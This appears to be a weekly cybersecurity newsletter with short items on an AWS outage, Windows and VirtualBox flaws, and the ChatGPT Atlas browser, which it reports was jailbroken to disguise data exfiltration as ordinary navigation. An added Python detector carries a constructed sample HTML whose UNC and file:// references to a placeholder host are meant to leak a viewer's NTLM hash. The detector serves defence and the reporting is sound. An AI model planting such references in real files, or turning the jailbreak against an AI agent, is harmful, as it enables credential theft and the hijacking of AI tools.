OpenAI’s ChatGPT Atlas browser, integrating AI for web tasks, has been jailbroken to disguise malicious activities as legitimate navigation, allowing hidden data exfiltration or script execution. The flaw exploits the browser’s agentic features, enabling attackers to override safeguards and perform unauthorized actions under AI assistance. Launched recently, it affects early adopters using the tool for automated browsing. OpenAI recommends limiting extensions and monitoring AI prompts to prevent jailbreak escalations in hybrid AI-web environments. Read more
Tech News
AWS Outage Disrupts Global Services
A widespread Amazon Web Services (AWS) outage struck on Monday, affecting millions of users and services including Amazon’s own e-commerce site, Snapchat, Prime Video, Canva, Capital One, Delta Air Lines, and DoorDash. The incident originated in a DNS resolution failure for the DynamoDB endpoint in the US-East-1 region, which left dependent platforms unable to reach the database and caused cascading operational halts. AWS engineers restored partial service by early afternoon; no cyberattack is suspected and a root-cause analysis was promised. The event underlines the risk of single-region and single-provider dependency in cloud infrastructure. Read more
Automatic BitLocker Encryption Locks User Data
A Reddit user reported that reinstalling Windows 11 unexpectedly enabled BitLocker encryption on two backup drives, locking 3TB of irreplaceable data without prior configuration or recovery keys. This silent activation in Windows 11 Pro and Enterprise editions, particularly version 24H2, triggers on hardware like TPM 2.0 and Secure Boot during clean installs, affecting non-boot storage less commonly documented. Recovery attempts failed, leading to data loss after formatting; experts recommend disabling BitLocker via registry tweaks or tools like Rufus during installation and always backing up keys to Microsoft accounts. Read more
Windows Updates Trigger Login Failures
Microsoft confirmed that security updates released on and after August 29, 2025, are causing Kerberos and NTLM authentication failures on Windows 11 24H2, 25H2, and Windows Server 2025 devices with duplicate Security Identifiers (SIDs). These issues arise from enhanced SID checks blocking authentication on cloned systems not prepared via Sysprep, resulting in symptoms like failed logins, remote desktop errors, and “access denied” messages. Administrators should rebuild affected systems using supported cloning methods or contact Microsoft Support for a temporary Group Policy workaround to restore access. Read more
Critical Vulnerabilities in Oracle VM VirtualBox
Oracle disclosed multiple high-severity vulnerabilities in VM VirtualBox versions 7.1.12 and 7.2.2, tracked under CVEs like CVE-2025-62587 to CVE-2025-62590 and CVE-2025-62641, each scoring 8.2 on CVSS 3.1. These Core component flaws allow local high-privileged attackers to compromise confidentiality, integrity, and availability, potentially enabling full takeover of the virtualization environment and exposure of virtual machine data. Patched in the October 2025 Critical Patch Update, users must update immediately, restrict access, and monitor for unusual activity to mitigate risks in development and enterprise setups. Read more
Microsoft Disables File Previews for Security
As part of the October 2025 security updates, Microsoft automatically disables the File Explorer preview pane for internet-downloaded files carrying the Mark of the Web, to block NTLM hash theft through malicious HTML content. Merely rendering such a file used to let elements such as <link> or <img>, whose href or src attributes point at an attacker-controlled server, trigger an outbound authentication attempt that leaks the user’s NTLM hash, a common vector in phishing campaigns. Trusted files can still be unblocked from the file’s Properties dialog, but the new default protects Windows 11 and Windows Server systems without user intervention. Read more
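What makes an HTML file dangerous to preview is any reference that the renderer fetches on its own, with a UNC path or file:// URL to a host the attacker controls being the classic NTLM leak. The block below is an added example, not Microsoft’s code: the sample document is constructed with placeholder hosts, and the set of auto-fetched tag/attribute pairs is the one a reviewer would start from, not a complete list. It separates references that cause a connection on render from those that do not, so a triage pipeline can flag the former before anyone opens the file.

```python
"""Added example: list references in an HTML file that a viewer fetches
automatically on render. Not Microsoft's code; sample document is constructed."""
import re
from html.parser import HTMLParser

# Tag/attribute pairs that are fetched without any click.
AUTO_FETCH = {
    ("link", "href"), ("img", "src"), ("script", "src"), ("iframe", "src"),
    ("source", "src"), ("video", "src"), ("audio", "src"), ("embed", "src"),
    ("object", "data"), ("input", "src"),
}
CSS_URL = re.compile(r"url\(\s*['\"]?([^'\")]+)", re.IGNORECASE)
UNC_OR_FILE = re.compile(r"^(\\\\|file:)", re.IGNORECASE)
HTTP = re.compile(r"^https?://", re.IGNORECASE)


class _RefCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            if (tag, name) in AUTO_FETCH:
                self.refs.append((tag, name, value.strip()))
            elif name == "style":                  # background-image: url(...)
                for url in CSS_URL.findall(value):
                    self.refs.append((tag, "style", url.strip()))


def classify(ref: str) -> str:
    if UNC_OR_FILE.match(ref):
        return "unc-or-file"    # \\host\share or file://host/...: SMB, NTLM sent on connect
    if HTTP.match(ref):
        return "remote-http"    # beacon at minimum; can also solicit NTLM over HTTP/WebDAV
    return "local"              # relative path, data: URI, fragment


def scan_html(html: str) -> list:
    collector = _RefCollector()
    collector.feed(html)
    return [(tag, attr, ref, classify(ref)) for tag, attr, ref in collector.refs]


def leaky_refs(html: str) -> list:
    """Only the references that cause a network connection on render."""
    return [r for r in scan_html(html) if r[3] != "local"]


# Constructed sample: two UNC references, one file:// reference, one remote image.
SAMPLE_HTML = r"""<html><head>
<link rel="stylesheet" href="\\203.0.113.5\share\style.css">
<link rel="icon" href="favicon.ico">
</head><body>
<img src="file://203.0.113.5/share/pixel.png">
<img src="https://cdn.example.invalid/logo.png">
<div style="background-image:url('\\203.0.113.5\c$\bg.png')">Invoice</div>
<a href="https://example.invalid/report">report</a>
</body></html>"""

if __name__ == "__main__":
    for ref in leaky_refs(SAMPLE_HTML):
        print(ref)
```

The <a href> is deliberately not reported: it needs a click. Everything leaky_refs returns fires the moment the file is rendered, which is exactly what the preview pane did before this update.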
Teams Introduces Auto Work Location Detection
Microsoft Teams is rolling out an opt-in feature in December 2025 to automatically detect and set users’ work locations based on connections to organizational Wi-Fi networks or desk peripherals like monitors. Enabled via PowerShell policy by admins, it updates locations to “In the Office” or specific buildings during set work hours from Outlook, requiring user consent and location sharing permissions for privacy. This aims to improve hybrid collaboration by syncing real-time presence, though it raises concerns over telemetry data and tracking in shared environments. Read more
The post Cybersecurity Newsletter Weekly – AWS Outage, WSUS Exploitation, Chrome Flaws, and RDP Attacks appeared first on Cyber Security News.
[Image: BIND 9 Cache Poisoning Vulnerability — CVE-2025-40778]